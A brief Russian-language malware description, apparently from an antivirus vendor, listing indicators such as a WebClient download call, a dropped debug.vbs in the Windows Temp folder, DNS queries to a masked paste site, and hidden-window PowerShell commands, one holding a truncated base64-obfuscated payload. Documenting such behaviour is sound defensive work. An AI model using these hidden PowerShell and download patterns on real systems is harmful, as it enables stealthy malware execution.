Техническая информация
- (new-object net.webclient
- %WINDIR%\temp\debug.vbs
- DNS ASK microsoft.com
- DNS ASK pa###bin.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Copy-Item -Path *.vbs -Destination %WINDIR%\Temp\Debug.vbs' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command $iUqm = 'JABSAG8AZABhAEMAbwBwAYHQDykAIAA9ACAAJwBBAEwARABlACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AYHQDyMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAYHQDyMAZQA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Copy-Item -Path *.vbs -Destination %WINDIR%\Temp\Debug.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command $iUqm = 'JABSAG8AZABhAEMAbwBwAYHQDykAIAA9ACAAJwBBAEwARABlACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AYHQDyMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAYHQDyMAZQA...